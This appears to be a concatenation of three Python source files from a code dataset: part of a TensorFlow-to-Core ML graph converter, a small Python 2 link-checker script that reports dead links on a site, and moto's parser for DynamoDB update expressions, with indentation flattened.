shape = self._get_placeholder_shape_from_tf_graph(tfgraph=graph, name=inp)
shape = [get_new_symbol() if s is None or s == -1 else s \
for s in shape]
inputs.append(TensorType(name=inp, shape=shape, dtype=dtype))
added_inputs[inp] = (shape, dtype)
if len(added_inputs) > 0:
logging.info(
"Adding Input not specified by users: '{}'".format(
added_inputs)
)
for idx, inp in enumerate(inputs):
# We set the default image format in TF as NHWC, since NHWC is used
# for TF unless GPU is specified as device.
if isinstance(inp, ImageType) and inputs[idx].channel_first is None:
inputs[idx].channel_first = False
self.inputs = tuple(inputs)
for inputtype in self.inputs:
if not isinstance(inputtype.shape, InputShape):
continue
if any([isinstance(s, RangeDim) for s in inputtype.shape.shape]):
continue
node = graph[inputtype.name]
shape = [-1 if is_symbolic(s) else s for s in inputtype.shape.shape]
node.attr["_output_shapes"] = [shape] # list of length 1
# infer outputs if not provided
self._validate_outputs(tfssa, outputs)
outputs = main_func.outputs if outputs is None else outputs
outputs = outputs if isinstance(outputs, (tuple, list)) else [outputs]
outputs = [x if isinstance(x, str) else x.name for x in outputs]
self.outputs = outputs
# We would like a stack so that we run conversion sequentially.
self.graph_stack = self._get_stack(tfssa, root="main")
self.context = TranscriptionContext()
self.tensorflow_passes = tensorflow_passes
def _get_placeholder_shape_from_tf_graph(self, tfgraph, name):
error_message = "Unable to determine the shape of input: {}." \
" Please provide its shape during conversion, using \n" \
"'ct.convert(..., inputs=[ct.TensorType(name='{}', shape=(_FILL_ME_) ),])".format(name, name)
if tfgraph[name].attr.get("shape", None) is not None:
shape = tfgraph[name].attr["shape"]
elif tfgraph[name].attr.get("_output_shapes", None) is not None:
shape = tfgraph[name].attr["_output_shapes"][0]
if shape is None:
raise ValueError(error_message)
else:
raise ValueError(error_message)
return shape
def _get_stack(self, tfssa, root="main"):
# We're trying to get a order of how to loop through the graphs.
# This is NOT necessarily a DAG.
dep = {x: [] for x in tfssa.functions}
for fname in tfssa.functions:
for node in tfssa.functions[fname].graph.values():
func_x, func_y = None, None
if node.op == "while":
func_x = node.attr["body_function"]
func_y = node.attr["cond_function"]
if func_x and fname not in dep[func_x]:
dep[func_x].append(fname)
if func_y and fname not in dep[func_y]:
dep[func_y].append(fname)
assert len(dep[root]) == 0
graph_stack = simple_topsort(dep)
return graph_stack
@staticmethod
def _get_tensor_name(tensor):
ret = None
if isinstance(tensor, str):
ret = tensor
else:
ret = tensor.name
return ret.split(":")[0]
def _validate_outputs(self, tfssa, outputs):
if outputs is None:
return
outputs = outputs if isinstance(outputs, (tuple, list)) else [outputs]
output_nodes = []
for f in tfssa.functions.values():
output_nodes += list(f.outputs)
all_nodes = []
for f in tfssa.functions.values():
all_nodes += list(f.graph.keys())
for n in outputs:
if self._get_tensor_name(n) not in output_nodes + all_nodes:
raise KeyError('Output node name "{}" does exist.'.format(n))
def check_placeholder_output(self, prog, outputs_name):
"""
Handle the cases where placeholder is output.
There is a case where the program is like
main(%Placeholder: (5,fp32)) {
block3() {
} -> (%Placeholder)
}
But self.outputs = ["Placeholder:0"]
We need to change the block output to Placeholder:0 by inserting an identity
"""
block = prog["main"]
input_name = [x.name for x in list(block.inputs.values())]
with block:
new_outputs = []
for output, output_name in zip(block.outputs, outputs_name):
if output.name not in input_name or output.name == output_name:
new_output = output
else:
new_output = mb.identity(x=output, name=output_name)
new_outputs.append(new_output)
block.set_outputs(new_outputs)
def convert_main_graph(self, prog, graph):
func_inputs = {}
for input_type in self.inputs:
func_inputs[input_type.name] = mb.placeholder(
input_type.shape.symbolic_shape, dtype=input_type.dtype)
prog.set_main_input_types(self.inputs)
with Function(func_inputs) as ssa_func:
# Get the input Var
for name in func_inputs.keys():
self.context.add(name, ssa_func.inputs[name])
outputs = convert_graph(self.context, graph, self.outputs)
ssa_func.set_outputs(outputs)
prog.add_function("main", ssa_func)
# check duplicate output
# Note: sometimes two outputs are pointing to the same Var, we should
# create mb.identity for those cases
block = prog["main"]
with block:
name_counts = {}
new_outputs = [output for output in block.outputs]
for i, v_o in enumerate(block.outputs):
if v_o.name not in name_counts:
name_counts[v_o.name] = 1
else:
name_counts[v_o.name] += 1
new_name = v_o.name + "_duplicate_" + str(name_counts[v_o.name])
x = mb.identity(x=v_o, name=new_name)
new_outputs[i] = x
block.set_outputs(new_outputs)
# Rename outputs to TF's name. This is needed when the last op doesn't
# generate a new Var (e.g., get_tuple, Identity etc.), and thus the
# last Var would have a different name than the last TF op's name.
#
# Example:
#
# TF code:
# x = tf.placeholder(tf.float32, shape=(1,))
# y = tf.placeholder(tf.float32, shape=(1,))
# c = lambda i, j: \
# tf.less(tf.math.reduce_mean(i), tf.math.reduce_mean(j))
# b = lambda i, j: (tf.add(i, 1), j)
# res = tf.while_loop(c, b, [x, y])
#
# Resulting nodes (excluding the nodes in while loop cond & body):
#
# node name: Placeholder op type: Placeholder inputs: []
# node name: Placeholder_1 op type: Placeholder inputs: []
# node name: make_input_0 op type: make_tuple inputs: ['Placeholder',
# 'Placeholder_1']
# node name: while_0 op type: while inputs: ['make_input_0']
# node name: while/Exit op type: get_tuple inputs: ['while_0']
# node name: while/Exit_1 op type: get_tuple inputs: ['while_0']
#
# Observe that return node `while/Exit` is an output from get_tuple,
# which in our translation simply unpack a python tuple of Vars
# ('while_0:0', 'while_0:1') returned from while_0 SSA op. We need to
# rename `while_0:0` to `while/Exit` in order for users to find the
# output.
# Note: only rename the output if the output is not Placeholder.
input_names = [x.name for x in self.inputs]
for v_o, out_name in zip(prog["main"].outputs, self.outputs):
if v_o.name != out_name and v_o.name not in input_names:
logging.info(
"Renaming output var: '{}' -> '{}'".format(v_o.name, out_name)
)
v_o.name = out_name
self.check_placeholder_output(prog, self.outputs)
@_profile
def convert(self):
prog = Program()
if len(self.graph_stack) == 0:
raise ValueError("At least one TF function must be present")
if self.graph_stack[0] != "main":
msg = "TF root graph must be named 'main'. Got {}"
raise ValueError(msg.format(self.graph_stack[0]))
graph = self.tfssa.functions["main"].graph
for g_name in self.graph_stack[1:]:
self.context.add_graph(g_name, self.tfssa.functions[g_name].graph)
self.convert_main_graph(prog, graph)
# Apply TF frontend passes on Program. These passes are different
# from passes applied to tfssa.
self.tensorflow_passes(prog)
return prog
| 1.8125 | 2 |
pylinkcheck.py | clayball/pylinkcheck | 0 | 4930 | <reponame>clayball/pylinkcheck<filename>pylinkcheck.py
#!/usr/bin/env python
# Copyright (c) 2016 <NAME>
#
# A Python-based link checker.
#
# Usage: pylinkcheck.py -r https://www.example.com
#
# By default, we can spider and check all of the links found at the URL's
# domain. For example, a check of https://foo.example.com will only check
# links with the base URL path of foo.example.com. Link found to
# bar.example.com will not be checked.
#
# Fancy run-time options
# url root (domain): this is simply required
# generate report file: -o output.txt, --output=output.txt
# limit depth: -l 2, --limit=2
# TODO: report format: --format=txt,html,xml
##############################################################################
import argparse
import urllib2
import csv
from datetime import datetime
import re
from urlparse import urlparse
from bs4 import BeautifulSoup
#######################################
# Functions
# Spider the base URL
def spiderURL(baseurl, pathlimit):
# build a list based on each sub directory found
print '[spider] path limit set to %d' % pathlimit
# Print an informative summary of the dead links
def printReport(deadlinks):
# print each item in the deadlinks list or CLEAN if empty
print '\n\n'
print '#' * 79
print ' Link Checker Results\n'
if not deadlinks:
print '[+] CLEAN: No dead links found'
else:
for item in deadlinks:
print '[-] NOT FOUND: %s' % item
#######################################
# Main program
#
# Get command line options
parser = argparse.ArgumentParser(description='A Python-based link checker.')
parser.add_argument('-f','--format', required=False, default='txt',
help='Output file format ')
parser.add_argument('-l','--limit', required=False, default=2,
help='Limit directory depth, example.com/limit/dir/depth/')
parser.add_argument('-u','--url', help='Base URL to check', required=True)
parser.add_argument('-o','--output', help='Output file name', required=False)
args = parser.parse_args()
# Assign program arguments to variables
# - we may want to add a '/' to baseurl if it's not present.
# - if the href links are relative we need to add the baseurl when checking
# the link.
baseurl = str(args.url)
pathlimit = int(args.limit)
# Show values
print 'Base URL: %s' % args.url
print 'Output file format: %s' % args.format
print 'Output file: %s' % args.output
print 'Limit spider: %d' % args.limit
# Grab today's date for timestamping output file.
now = datetime.now()
tstamp = now.strftime("%Y%m%d-%H%M")
# Grab all a href links
checkurl = urllib2.urlopen(baseurl).read()
soup = BeautifulSoup(checkurl, 'html.parser')
# Spider the site and build our list of URLs to check
spiderURL(baseurl, pathlimit)
deadlinks = []
# This for loop will completely change once the spiderURL function is working.
# We'll iterate over the various directory paths instead.
outofscope = 0
# Check the URLs
for link in soup("a"):
# Fetch the link but only return the status code
# hrefs are unpredicatable we can add a function to 'clean' them up, i.e.,
# get the proto, domain, path, file (TODO: for a complete solution we
# need to get all of this)
#if baseurl[:-1] == '/':
# print '[debug] strip last char from baseurl'
# mailto: is causing an error
href = link.get('href')
print '[debug] href: %s' % href
if re.match('^mailto', href):
# skip this one
continue
# Separate the file from the path
thisurl = urlparse(href)
if thisurl.netloc != baseurl and thisurl.netloc != '':
print '[-] HREF %s is out of scope' % thisurl.netloc
outofscope = 1
else:
print '[debug] path %s' % thisurl.path
outofscope = 0
# Build the full URL if the href is relative.
# - assuming, for now, other protocols are not desired
# - place this in the Spider function
try:
if re.match('^http', href):
checkurl = href
else:
checkurl = baseurl + href
except:
print '[-] Unknown error in re.match()'
try:
#print '[+] checking %s' % checkurl
hrefpage = urllib2.urlopen(checkurl)
except urllib2.HTTPError as e:
if e.code == 404:
print '[-] 404 ERROR: %s' % checkurl
# add this URL to deadlink list
deadlinks.append(checkurl)
else:
print '[-] HTTP ERROR: %d - %s' % (e.code, checkurl)
except urllib2.URLError as e:
# Not an HTTP-specific error (e.g. connection refused)
print '[-] NON-HTTP ERROR: %d - %s' % (e.code, checkurl)
else:
print '[+] Status %d for %s' % (hrefpage.getcode(), checkurl)
printReport(deadlinks)
# EOF | 2.734375 | 3 |
moto/dynamodb2/parsing/expressions.py | orenmazor/moto | 1 | 4931 | <reponame>orenmazor/moto
import logging
from abc import abstractmethod
import abc
import six
from collections import deque
from moto.dynamodb2.parsing.ast_nodes import (
UpdateExpression,
UpdateExpressionSetClause,
UpdateExpressionSetActions,
UpdateExpressionSetAction,
UpdateExpressionRemoveActions,
UpdateExpressionRemoveAction,
UpdateExpressionPath,
UpdateExpressionValue,
UpdateExpressionGroupedValue,
UpdateExpressionRemoveClause,
ExpressionPathDescender,
ExpressionSelector,
ExpressionAttribute,
ExpressionAttributeName,
ExpressionAttributeValue,
ExpressionValueOperator,
UpdateExpressionFunction,
UpdateExpressionAddClause,
UpdateExpressionAddActions,
UpdateExpressionAddAction,
UpdateExpressionDeleteAction,
UpdateExpressionDeleteActions,
UpdateExpressionDeleteClause,
)
from moto.dynamodb2.exceptions import InvalidTokenException, InvalidUpdateExpression
from moto.dynamodb2.parsing.tokens import Token, ExpressionTokenizer
class NestableExpressionParserMixin(object):
"""
For nodes that can be nested in themselves (recursive). Take for example UpdateExpression's grammar:
UpdateExpression => UpdateExpressionClause*
UpdateExpression => UpdateExpressionClause* UpdateExpression
If we consider it of structure
NestableExpression => TargetClause*
NestableExpression => TargetClause* NestableExpression
This pattern comes back multiple times. This Mixin adds re-usability for that type of pattern.
This approach is taken since it allows to remain the ordering of the Nodes as how the corresponding tokens where
in the originating expression.
"""
def __init__(self, *args, **kwargs):
self.target_clauses = deque()
def _parse_target_clause(self, factory_class):
"""
Args:
factory_class: The factory for the target clause e.g. UpdateExpressionSetClauseParser
Returns:
"""
logging.debug(
"Move token pos {pos} to continue parsing with specific factory class {fc}".format(
pos=self.token_pos, fc=factory_class.__class__.__name__
)
)
# noinspection PyProtectedMember
ast, token_pos = factory_class(**self._initializer_args())._parse_with_pos()
self.target_clauses.append(ast)
logging.debug(
"Continue where previous parsing ended {token_pos}".format(
token_pos=token_pos
)
)
self.token_pos = token_pos
@abstractmethod
def _initializer_args(self):
"""
Get the arguments of the initializer. This is implemented by the calling class. See ExpressionParser for an
example.
Returns:
dict: A dictionary of the initializer arguments
"""
@classmethod
@abstractmethod
def _nestable_class(cls):
"""
Get the class of the Node that will be created that would be nested. For the example in the docstring this would
be UpdateExpression
Returns:
class: The class of the Nodes that will be created.
"""
def _create_node(self):
"""
target_clauses has the nodes in order of encountering. Go through them backwards and build the tree bottom up.
This way left-deep-descending traversal will process nodes in order.
Continuing the example of an UpdateExpression:
For example SET a=3 REMOVE b
UpdateExpression
/ \
SET a=3 UpdateExpression
|
REMOVE b
self.target_clauses looks like: ( SET a=3 >> REMOVE b )
Returns:
moto.dynamodb2.ast_nodes.Node: Node of an AST representing the Expression as produced by the factory.
"""
assert len(self.target_clauses) > 0, "No nodes for {cn}".format(
cn=self.__class__.__name__
)
target_node = self._nestable_class()(children=[self.target_clauses.pop()])
while len(self.target_clauses) > 0:
target_node = self._nestable_class()(
children=[self.target_clauses.pop(), target_node]
)
return target_node
@six.add_metaclass(abc.ABCMeta)
class ExpressionParser:
"""Abstract class"""
def __init__(self, expression_token_list, token_pos=0):
"""
Args:
expression_token_list:
token_pos(int): Location where parsing is
"""
self.token_list = expression_token_list
self.token_pos = token_pos
def _initializer_args(self):
return {"expression_token_list": self.token_list, "token_pos": self.token_pos}
@abstractmethod
def _parse(self):
"""
Start parsing the token_list from token_pos for the factory type.
Returns:
moto.dynamodb2.ast_nodes.Node: AST which is root node of resulting abstract syntax tree
"""
@classmethod
def is_possible_start(cls, token):
return token is not None and cls._is_possible_start(token)
@classmethod
@abstractmethod
def _is_possible_start(cls, token):
"""
Args:
token(moto.dynamodb2.tokens.Token):
Returns:
bool: True if token is a possible start for entries processed by `cls`
"""
def _parse_with_pos(self):
"""
Start parsing the token_list from token_pos for the factory type and also return the resulting token_pos.
Returns:
(ast, token_pos): tuple of AST which is root node of resulting abstract syntax tree and token_pos is the
position in the tokenlist.
"""
return self._parse(), self.token_pos
def parse(self):
return self._parse()
def get_next_token_type(self):
"""
Get the type of the next token to be processed
Returns:
str: Token type or None if no more next token
"""
try:
return self.get_next_token().type
except AttributeError:
return None
def get_next_token(self):
"""
Get the next token to be processed
Returns:
moto.dynamodb2.tokens.Token: or None if no more next token
"""
try:
return self.token_list[self.token_pos]
except IndexError:
return None
def get_next_token_value(self):
"""
Get the value of the next token to be processed
Returns:
str: value or None if no more next token
"""
try:
return self.get_next_token().value
except AttributeError:
return None
def is_at_end(self):
"""Return boolean indicating whether we are at end of the parsing"""
return self.token_pos == len(self.token_list)
def is_at_start(self):
"""Return boolean indicating whether we are at start of the parsing"""
return self.token_pos == 0
def get_last_token_value(self):
"""Get the last token that was correctly parsed or return empty string"""
if self.token_pos > 0:
return self.token_list[self.token_pos - 1].value
else:
return ""
def get_last_token_type(self):
"""Get the last token type that was correctly parsed or return None"""
if self.token_pos > 0:
return self.token_list[self.token_pos - 1].type
else:
return None
def get_2nd_last_token_value_if_last_was_whitespace(self):
"""Get the 2nd last token that was correctly parsed if last one was whitespace or return empty string"""
if self.token_pos > 1 and self.get_last_token_type() == Token.WHITESPACE:
return self.token_list[self.token_pos - 2].value
else:
return ""
def get_following_token_value(self):
"""Get the token value after the one that is being parsed or empty string if non existent."""
try:
return self.token_list[self.token_pos + 1].value
except IndexError:
return ""
def get_following_token_type(self):
"""Get the token type after the one that is being parsed or None if non existent."""
try:
return self.token_list[self.token_pos + 1].type
except IndexError:
return None
def get_2nd_following_token_value_if_following_was_whitespace(self):
"""Get the 2nd following token that was correctly parsed if 1st one was whitespace or return empty string"""
if self.get_following_token_type() == Token.WHITESPACE:
try:
return self.token_list[self.token_pos + 2].value
except IndexError:
return ""
else:
return ""
def skip_white_space(self):
try:
while self.get_next_token_type() == Token.WHITESPACE:
self.token_pos += 1
except IndexError:
assert self.token_pos > 0, "We should always have positive indexes"
logging.debug("We are out of range so end is reached")
def process_token_of_type(self, token_type):
"""
Maker sure the next token is of type `token_type` if not raise unexpected token
Args:
token_type: A token type
Returns:
str: The value if the token is of type `token_type`
"""
if self.get_next_token_type() == token_type:
token_value = self.get_next_token_value()
self.goto_next_significant_token()
return token_value
else:
self.raise_unexpected_token()
def goto_next_significant_token(self):
"""Continue past current token and skip all whitespaces"""
self.token_pos += 1
self.skip_white_space()
def raise_unexpected_token(self):
if self.is_at_end():
problematic_token = "<EOF>"
problematic_token_in_near = ""
else:
problematic_token_in_near = problematic_token = self.get_next_token_value()
near = "".join(
[
self.get_2nd_last_token_value_if_last_was_whitespace(),
self.get_last_token_value(),
problematic_token_in_near,
self.get_following_token_value(),
self.get_2nd_following_token_value_if_following_was_whitespace(),
]
)
raise InvalidTokenException(problematic_token, near)
class NestableBinExpressionParser(ExpressionParser):
"""
For nodes that can be nested in themselves (recursive) but with an operation. Take for example
UpdateExpressionValue's grammar:
Value => Operand*
Value => Operand* + Value
Value => Operand* - Value
If we consider it of structure
NestableBinExpression => TargetClause*
NestableBinExpression => TargetClause* BinOp NestableBinExpression
This pattern comes back multiple times. This Mixin adds re-usability for that type of pattern.
This approach is taken since it allows to remain the ordering of the Nodes as how the corresponding tokens where
in the originating expression.
"""
def __init__(self, *args, **kwargs):
super(NestableBinExpressionParser, self).__init__(*args, **kwargs)
self.target_nodes = deque()
def _parse_target_clause(self, factory_class):
"""
Args:
factory_class: The factory for the target clause e.g. UpdateExpressionSetClauseParser
Returns:
"""
# noinspection PyProtectedMember
ast, self.token_pos = factory_class(
**self._initializer_args()
)._parse_with_pos()
self.target_nodes.append(ast)
logging.debug(
"Continue where previous parsing ended {token_pos}".format(
token_pos=self.token_pos
)
)
def _parse(self):
self._parse_target_clause(self._operand_factory_class())
while self._binop_factory_class().is_possible_start(self.get_next_token()):
self._parse_target_clause(self._binop_factory_class())
if self._operand_factory_class().is_possible_start(self.get_next_token()):
self._parse_target_clause(self._operand_factory_class())
else:
self.raise_unexpected_token()
return self._create_node()
@abstractmethod
def _operand_factory_class(self):
"""
Get the Parser class of the Operands for the Binary operations/actions.
Returns:
class:
"""
@abstractmethod
def _binop_factory_class(self):
"""
Get a factory that gets the possible binary operation.
Returns:
class: A class extending ExpressionParser
"""
def _create_node(self):
"""
target_clauses has the nodes in order of encountering. Go through them forward and build the tree bottom up.
For simplicity docstring will use Operand Node rather than the specific node
This way left-deep-descending traversal will process nodes in order.
Continuing the example of an UpdateExpressionValue:
For example value => a + :val - :val2
UpdateExpressionValue
/ | \
UpdateExpressionValue BinOp Operand
/ | | | |
UpdateExpressionValue BinOp Operand - :val2
/ | |
Operand + :val
|
a
self.target_nodes looks like: ( a >> + >> :val >> - >> :val2 )
Returns:
moto.dynamodb2.ast_nodes.Node: Node of an AST representing the Expression as produced by the factory.
"""
if len(self.target_nodes) == 1:
return UpdateExpressionValue(children=[self.target_nodes.popleft()])
else:
target_node = UpdateExpressionValue(
children=[
self.target_nodes.popleft(),
self.target_nodes.popleft(),
self.target_nodes.popleft(),
]
)
while len(self.target_nodes) >= 2:
target_node = UpdateExpressionValue(
children=[
target_node,
self.target_nodes.popleft(),
self.target_nodes.popleft(),
]
)
assert len(self.target_nodes) == 0
return target_node
class UpdateExpressionParser(ExpressionParser, NestableExpressionParserMixin):
"""
Parser to create update expressions
"""
@classmethod
def _sub_factories(cls):
return [
UpdateExpressionSetClauseParser,
UpdateExpressionAddClauseParser,
UpdateExpressionDeleteClauseParser,
UpdateExpressionRemoveClauseParser,
]
@classmethod
def _is_possible_start(cls, token):
pass
def __init__(self, *args, **kwargs):
super(UpdateExpressionParser, self).__init__(*args, **kwargs)
NestableExpressionParserMixin.__init__(self)
@classmethod
def _nestable_class(cls):
return UpdateExpression
def _parse_expression_clause(self, factory_class):
return self._parse_target_clause(factory_class)
def _parse_by_a_subfactory(self):
for sub_factory in self._sub_factories():
if sub_factory.is_possible_start(self.get_next_token()):
self._parse_expression_clause(sub_factory)
return True
return False
def _parse(self):
"""
Update Expression is the top-most node therefore it is expected to end up at the end of the expression.
"""
while True:
self.skip_white_space()
if self.is_at_end():
logging.debug("End reached")
break
elif self._parse_by_a_subfactory():
continue
else:
self.raise_unexpected_token()
return self._create_node()
@classmethod
def make(cls, expression_str):
token_list = ExpressionTokenizer.make_list(expression_str)
return cls(token_list).parse()
class UpdateExpressionSetClauseParser(ExpressionParser):
"""
UpdateExpressionSetClause => SET SetActions
"""
@classmethod
def _is_possible_start(cls, token):
return token.type == Token.ATTRIBUTE and token.value.upper() == "SET"
def _parse(self):
assert self.is_possible_start(self.get_next_token())
self.goto_next_significant_token()
ast, self.token_pos = UpdateExpressionSetActionsParser(
**self._initializer_args()
)._parse_with_pos()
# noinspection PyProtectedMember
return UpdateExpressionSetClause(children=[ast])
class UpdateExpressionActionsParser(ExpressionParser, NestableExpressionParserMixin):
"""
UpdateExpressionSetActions
"""
def __init__(self, *args, **kwargs):
super(UpdateExpressionActionsParser, self).__init__(*args, **kwargs)
NestableExpressionParserMixin.__init__(self)
@classmethod
def _is_possible_start(cls, token):
raise RuntimeError(
"{class_name} cannot be identified by the next token.".format(
class_name=cls._nestable_class().__name__
)
)
@classmethod
@abstractmethod
def _nestable_class(cls):
return UpdateExpressionSetActions
@classmethod
@abstractmethod
def _nested_expression_parser_class(cls):
"""Returns the parser for the query part that creates the nested nodes"""
def _parse(self):
"""
UpdateExpressionSetActions is inside the expression so it can be followed by others. Process SetActions one by
one until no more SetAction.
"""
self.skip_white_space()
while self._nested_expression_parser_class().is_possible_start(
self.get_next_token()
):
self._parse_target_clause(self._nested_expression_parser_class())
self.skip_white_space()
if self.get_next_token_type() == Token.COMMA:
self.goto_next_significant_token()
else:
break
if len(self.target_clauses) == 0:
logging.debug(
"Didn't encounter a single {nc} in {nepc}.".format(
nc=self._nestable_class().__name__,
nepc=self._nested_expression_parser_class().__name__,
)
)
self.raise_unexpected_token()
return self._create_node()
class UpdateExpressionSetActionsParser(UpdateExpressionActionsParser):
"""
UpdateExpressionSetActions
"""
@classmethod
def _nested_expression_parser_class(cls):
return UpdateExpressionSetActionParser
@classmethod
def _nestable_class(cls):
return UpdateExpressionSetActions
class UpdateExpressionSetActionParser(ExpressionParser):
"""
SetAction => Path = Value
So we create an UpdateExpressionSetAction Node that has 2 children. Left child Path and right child Value.
"""
@classmethod
def _is_possible_start(cls, token):
return UpdateExpressionPathParser.is_possible_start(token)
def _parse(self):
"""
UpdateExpressionSetActionParser only gets called when expecting a SetAction. So we should be aggressive on
raising invalid Tokens. We can thus do the following:
1) Process path
2) skip whitespace if there are any
3) Process equal-sign token
4) skip whitespace if there are any
3) Process value
"""
path, self.token_pos = UpdateExpressionPathParser(
**self._initializer_args()
)._parse_with_pos()
self.skip_white_space()
self.process_token_of_type(Token.EQUAL_SIGN)
self.skip_white_space()
value, self.token_pos = UpdateExpressionValueParser(
**self._initializer_args()
)._parse_with_pos()
return UpdateExpressionSetAction(children=[path, value])
class UpdateExpressionPathParser(ExpressionParser):
"""
Paths are selectors within items to specify a part within an Item. DynamoDB does not impose much restrictions on the
data it stores but it does store more strict restrictions on how they are represented in UpdateExpression's.
"""
def __init__(self, *args, **kwargs):
super(UpdateExpressionPathParser, self).__init__(*args, **kwargs)
self.path_nodes = []
@classmethod
def _is_possible_start(cls, token):
"""
Args:
token(Token): the token to be checked
Returns:
bool: Whether the token could be the start of an UpdateExpressionPath
"""
if token.type == Token.ATTRIBUTE_NAME:
return True
elif token.type == Token.ATTRIBUTE and token.value.upper() != "REMOVE":
"""We have to make sure remove is not passed"""
return True
return False
def _parse(self):
return self.process_path()
def process_path(self):
self.parse_path()
return UpdateExpressionPath(children=self.path_nodes)
def parse_path(self):
"""
A path is comprised of:
- Attribute: the name of an attribute as how it is stored which has no special characters
- ATTRIBUTE_NAME: A placeholder that has no special characters except leading # to refer to attributes that
have a name that is not allowed in an UpdateExpression)
- DOT's: These are used to decent in a nested structure. When a DOT is in a path expression it is never part
of an attribute name but always means to descent into a MAP. We will call each descend a patch
chain
- SELECTORs: E.g.: [1] These are used to select an element in ordered datatypes like a list.
Whitespaces can be between all these elements that build a path. For SELECTORs it is also allowed to have
whitespaces between brackets and numbers but the number cannot be split up with spaces
Attributes and attribute_names must be separated with DOT's.
Returns:
UpdateExpressionPath:
"""
self.parse_path_chain()
while self.is_next_token_start_of_patch_chain():
self.process_dot()
self.parse_path_chain()
def is_next_token_start_of_patch_chain(self):
return self.get_next_token_type() == Token.DOT
def process_dot(self):
self.path_nodes.append(ExpressionPathDescender())
self.goto_next_significant_token()
def parse_path_chain(self):
self.process_attribute_identifying_token()
self.skip_white_space()
while self.is_next_token_start_of_selector():
self.process_selector()
self.skip_white_space()
def process_attribute_identifying_token(self):
if self.get_next_token_type() == Token.ATTRIBUTE:
self.path_nodes.append(ExpressionAttribute(self.get_next_token_value()))
elif self.get_next_token_type() == Token.ATTRIBUTE_NAME:
self.path_nodes.append(ExpressionAttributeName(self.get_next_token_value()))
else:
self.raise_unexpected_token()
self.goto_next_significant_token()
def is_next_token_start_of_selector(self):
return self.get_next_token_type() == Token.OPEN_SQUARE_BRACKET
def process_selector(self):
"""
Process the selector is only called when a selector must be processed. So do the following actions:
- skip opening bracket
- skip optional spaces
- read numeric literal
- skip optional spaces
- pass closing bracket
"""
self.process_token_of_type(Token.OPEN_SQUARE_BRACKET)
selector_value = self.process_token_of_type(Token.NUMBER)
self.process_token_of_type(Token.CLOSE_SQUARE_BRACKET)
self.path_nodes.append(ExpressionSelector(selector_value))
class UpdateExpressionValueParser(NestableBinExpressionParser):
@classmethod
def _is_possible_start(cls, token):
return UpdateExpressionOperandParser.is_possible_start(token)
def _operand_factory_class(self):
return UpdateExpressionOperandParser
def _binop_factory_class(self):
return UpdateExpressionValueOperatorParser
class UpdateExpressionGroupedValueParser(ExpressionParser):
"""
A grouped value is an Update Expression value clause that is surrounded by round brackets. Each Operand can be
a grouped value by itself.
"""
def _parse(self):
self.process_token_of_type(Token.OPEN_ROUND_BRACKET)
value, self.token_pos = UpdateExpressionValueParser(
**self._initializer_args()
)._parse_with_pos()
self.process_token_of_type(Token.CLOSE_ROUND_BRACKET)
return UpdateExpressionGroupedValue(children=value)
@classmethod
def _is_possible_start(cls, token):
return token.type == Token.OPEN_ROUND_BRACKET
class UpdateExpressionValueOperatorParser(ExpressionParser):
OPERATION_TOKENS = [Token.PLUS_SIGN, Token.MINUS_SIGN]
@classmethod
def _is_possible_start(cls, token):
return token.type in cls.OPERATION_TOKENS
def _parse(self):
operation_value = self.get_next_token_value()
assert operation_value in self.OPERATION_TOKENS
self.goto_next_significant_token()
return ExpressionValueOperator(operation_value)
class UpdateExpressionOperandParser(ExpressionParser):
"""
Grammar
Operand* => AttributeValue
Operand* => UpdateExpressionFunction
Operand* => Path
Operand* => GroupedValue
"""
@classmethod
def _sub_factories(cls):
return [
UpdateExpressionAttributeValueParser,
UpdateExpressionFunctionParser,
UpdateExpressionPathParser,
UpdateExpressionGroupedValueParser,
]
@classmethod
def _is_possible_start(cls, token):
return any(parser.is_possible_start(token) for parser in cls._sub_factories())
def _parse(self):
for factory in self._sub_factories():
if factory.is_possible_start(self.get_next_token()):
node, self.token_pos = factory(
**self._initializer_args()
)._parse_with_pos()
return node
self.raise_unexpected_token()
class UpdateExpressionAttributeValueParser(ExpressionParser):
def _parse(self):
attr_value = ExpressionAttributeValue(
self.process_token_of_type(Token.ATTRIBUTE_VALUE)
)
return attr_value
@classmethod
def _is_possible_start(cls, token):
return token.type == Token.ATTRIBUTE_VALUE
class UpdateExpressionAttributeValueOrPathParser(ExpressionParser):
def _parse(self):
if UpdateExpressionAttributeValueParser.is_possible_start(
self.get_next_token()
):
token, self.token_pos = UpdateExpressionAttributeValueParser(
**self._initializer_args()
)._parse_with_pos()
else:
token, self.token_pos = UpdateExpressionPathParser(
**self._initializer_args()
)._parse_with_pos()
return token
@classmethod
def _is_possible_start(cls, token):
return any(
[
UpdateExpressionAttributeValueParser.is_possible_start(token),
UpdateExpressionPathParser.is_possible_start(token),
]
)
class UpdateExpressionFunctionParser(ExpressionParser):
"""
A helper to process a function of an Update Expression
"""
# Map function to the factories for its elements
FUNCTIONS = {
"if_not_exists": [
UpdateExpressionPathParser,
UpdateExpressionAttributeValueOrPathParser,
],
"list_append": [UpdateExpressionOperandParser, UpdateExpressionOperandParser],
}
@classmethod
def _is_possible_start(cls, token):
"""
Check whether a token is supposed to be a function
Args:
token(Token): the token to check
Returns:
bool: True if token is the start of a function.
"""
if token.type == Token.ATTRIBUTE:
return token.value in cls.FUNCTIONS.keys()
else:
return False
def _parse(self):
function_name = self.get_next_token_value()
if function_name not in self.FUNCTIONS.keys():
# Function names are case sensitive
raise InvalidUpdateExpression(function_name)
self.goto_next_significant_token()
self.process_token_of_type(Token.OPEN_ROUND_BRACKET)
function_elements = [function_name]
function_arguments = self.FUNCTIONS[function_name]
for i, func_elem_factory in enumerate(function_arguments):
func_elem, self.token_pos = func_elem_factory(
**self._initializer_args()
)._parse_with_pos()
function_elements.append(func_elem)
if i + 1 < len(function_arguments):
self.skip_white_space()
self.process_token_of_type(Token.COMMA)
self.process_token_of_type(Token.CLOSE_ROUND_BRACKET)
return UpdateExpressionFunction(children=function_elements)
class UpdateExpressionRemoveClauseParser(ExpressionParser):
"""
UpdateExpressionRemoveClause => REMOVE RemoveActions
"""
def _parse(self):
assert self.is_possible_start(self.get_next_token())
self.goto_next_significant_token()
ast, self.token_pos = UpdateExpressionRemoveActionsParser(
**self._initializer_args()
)._parse_with_pos()
# noinspection PyProtectedMember
return UpdateExpressionRemoveClause(children=[ast])
@classmethod
def _is_possible_start(cls, token):
"""REMOVE is not a keyword"""
return token.type == Token.ATTRIBUTE and token.value.upper() == "REMOVE"
class UpdateExpressionRemoveActionsParser(UpdateExpressionActionsParser):
"""
UpdateExpressionSetActions
"""
@classmethod
def _nested_expression_parser_class(cls):
return UpdateExpressionRemoveActionParser
@classmethod
def _nestable_class(cls):
return UpdateExpressionRemoveActions
